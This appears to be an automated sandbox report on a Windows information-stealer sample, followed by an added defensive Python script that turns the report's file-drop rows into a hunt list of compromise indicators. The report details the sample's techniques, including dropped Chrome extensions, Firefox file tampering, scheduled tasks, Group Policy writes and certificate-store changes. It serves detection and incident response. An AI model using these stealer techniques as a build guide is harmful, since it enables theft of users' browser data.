Malware Analysis Report

2024-11-30 02:43

Sample ID: 240407-vjg2pshf87
Target: d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833
SHA256: d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833
Tags: discovery spyware stealer
Score: 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 8/10

SHA256: d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833

Threat Level: Likely malicious

The file d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833 was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Checks installed software on the system

Drops desktop.ini file(s)

Drops Chrome extension

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-04-07 17:01

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-04-07 17:00

Reported: 2024-04-07 17:03

Platform: win10v2004-20240226-en

Max time kernel: 91s

Max time network: 93s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Program Files (x86)\orRvbnhdU\BoIyvtW.xml | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Program Files (x86)\YrliKKkuhgWU2\vqoJCaF.xml | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\aoJBGiA.dll | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Program Files (x86)\ycfBUKIjHxeOC\CUnMhGJ.dll | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Program Files (x86)\orRvbnhdU\cJnNzB.dll | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Program Files (x86)\YrliKKkuhgWU2\qcPJmnQNozuBD.dll | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Program Files (x86)\ycfBUKIjHxeOC\DSqYrZi.xml | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\dbotFoU.xml | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File created | C:\Program Files (x86)\IgAQuzzvNCUn\LfHJfAd.dll | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job | C:\Windows\SysWOW64\schtasks.exe | N/A
File created | C:\Windows\Tasks\aUYdFpynDtMaquqaO.job | C:\Windows\SysWOW64\schtasks.exe | N/A
File created | C:\Windows\Tasks\yozVwwMRZiDXbVH.job | C:\Windows\SysWOW64\schtasks.exe | N/A
File created | C:\Windows\Tasks\YGcJOiVocZfwUgdee.job | C:\Windows\SysWOW64\schtasks.exe | N/A
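The file-drop tables above (Chrome extension, desktop.ini, System32, Program Files and Windows directory) are the host artifacts a responder would hunt for. What follows is an added example, not part of the sandbox report, that parses a copy of those rows into a hunt list: it pulls out the two Chrome extension IDs, the four scheduled-task names, the randomly named directories under Program Files (x86), the Firefox omni.ja / .xpi tampering and the local Group Policy writes. It also records which processes wrote under C:\Windows\SysWOW64\config\systemprofile or C:\$RECYCLE.BIN\S-1-5-18, because that is the LocalSystem profile and SID, so those processes were running as SYSTEM by the time they wrote there (the powershell.exe key creations under \REGISTRY\USER\.DEFAULT in the HKEY_USERS table say the same thing, since .DEFAULT is the hive LocalSystem sees as HKCU). The CryptnetUrlCache entries themselves are CryptoAPI's revocation-check cache and are not useful indicators on their own. The category names and classification rules are the author's own assumptions; the rows are copied from the report, and the parser relies on the process column never containing a space, which holds for every row here.

```python
"""Turn the report's flattened file-drop rows into a hunt list.

Added example, not part of the sandbox report. Rows are copied from the
report; category names and rules are the author's own. Assumes the process
path (third column) contains no spaces, which is what makes the
space-separated rows parseable.
"""
import re
from collections import defaultdict

# Rows copied from the report's "Drops ..." tables, as the page renders them.
ROWS = r"""
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\BoIyvtW.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\vqoJCaF.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\aoJBGiA.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\CUnMhGJ.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\cJnNzB.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\IgAQuzzvNCUn\LfHJfAd.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\aUYdFpynDtMaquqaO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\yozVwwMRZiDXbVH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YGcJOiVocZfwUgdee.job C:\Windows\SysWOW64\schtasks.exe N/A
"""

# description, indicator (may contain spaces), process (no spaces), trailing "N/A" target
ROW_RE = re.compile(r"^(File created|File opened for modification) (.+?) (C:\\\S+) N/A$")

# (category, regex applied to the indicator path, what to record: the first
# capture group of the match, or the writing process). Author's own rules.
RULES = [
    ("chrome_extension_id",
     re.compile(r"\\Chrome\\User Data\\[^\\]+\\Extensions\\([a-p]{32})\\"), "group"),
    ("firefox_tamper",
     re.compile(r"\\Mozilla Firefox\\browser\\(omni\.ja(?:\.bak)?|features\\[^\\]+\.xpi)$"), "group"),
    ("scheduled_task",
     re.compile(r"^C:\\Windows\\Tasks\\([^\\]+)\.job$", re.I), "group"),
    ("local_gpo_write",
     re.compile(r"\\GroupPolicy\\((?:Machine\\)?(?:Registry\.pol|gpt\.ini))$", re.I), "group"),
    ("progfiles_x86_random_dir",
     re.compile(r"^C:\\Program Files \(x86\)\\([A-Za-z0-9]+)\\[A-Za-z0-9]+\.(?:dll|xml)$"), "group"),
    # systemprofile is LocalSystem's profile directory; S-1-5-18 is its SID.
    ("ran_as_localsystem",
     re.compile(r"\\config\\systemprofile\\|\\\$RECYCLE\.BIN\\S-1-5-18\\", re.I), "process"),
]


def parse_rows(text):
    """Split each space-separated row into (description, indicator, process)."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        rows.append(m.groups())
    return rows


def hunt_list(text=ROWS):
    """Return ({category: sorted unique values}, [indicators no rule matched])."""
    found, unclassified = defaultdict(set), []
    for _desc, indicator, process in parse_rows(text):
        for category, rx, record in RULES:
            m = rx.search(indicator)
            if m:
                found[category].add(process if record == "process" else m.group(1))
                break
        else:
            unclassified.append(indicator)
    return {k: sorted(v) for k, v in found.items()}, unclassified


if __name__ == "__main__":
    iocs, rest = hunt_list()
    for category, values in iocs.items():
        print(f"{category}:")
        for value in values:
            print(f"  {value}")
    for indicator in rest:
        print(f"unclassified: {indicator}")
```

The randomly named Program Files (x86) directories and the .job names are the items worth turning into host sweeps; the Chrome extension IDs and the omni.ja.bak / .xpi writes are what to look for in browser profiles and the Firefox install directory.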

Enumerates physical storage devices

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
